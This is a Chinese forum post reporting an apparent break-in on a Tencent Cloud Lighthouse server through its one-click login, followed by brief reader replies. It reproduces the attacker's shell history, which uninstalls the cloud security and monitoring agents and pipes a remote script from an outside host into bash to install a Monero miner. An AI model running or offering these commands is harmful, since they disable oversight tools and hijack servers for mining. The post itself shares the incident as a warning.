共计 691 个字符,预计需要花费 2 分钟才能阅读完成。
|
前帖:https://hostloc.com/thread-1021600-1-1.html
轻量后台有个 一键登陆的锅
后门 脚本:https://5.linshi.co/ww80.sh
找到 lighthouse 日志看到的
由于权限有限,所以除了挖矿搞不了啥,把一键登录关了,删了挖矿就好了。
#1651856332
sudo -i
#1651856364
/usr/local/qcloud/stargate/admin/uninstall.sh
#1651856364
/usr/local/qcloud/YunJing/uninst.sh
#1651856364
/usr/local/qcloud/monitor/barad/admin/uninstall.sh
#1651856364
sudo -i
#1651856368
exit
#1651856382
curl -s -L https://5.linshi.co/ww80.sh | bash -s 100023489107
#1651856398
mv moneroocean .moneroocean
#1651856408
lsls
#1651856422
ls -a
#1653293830
w
#1653293952
exit
|
网友回复:
注册 : 不知所云
Tou: 啥轻量漏洞,给个上下文
HOH: 你怎么发现
nnt: 不知所云
菜单 : 我敢说这个脚本作者是 mjj 的一员
tboy: echo “[*] Setup complete by zjzjzjzj” 复制代码
司马南 : 是他这个脚本我看到了小众的源码
zxxx: 老哥牛逼。。。
司马南 : 是不是关闭了一键登陆就行了
注册 : 自己反思一下
注册 : 家贼难防
表妹 : Yes
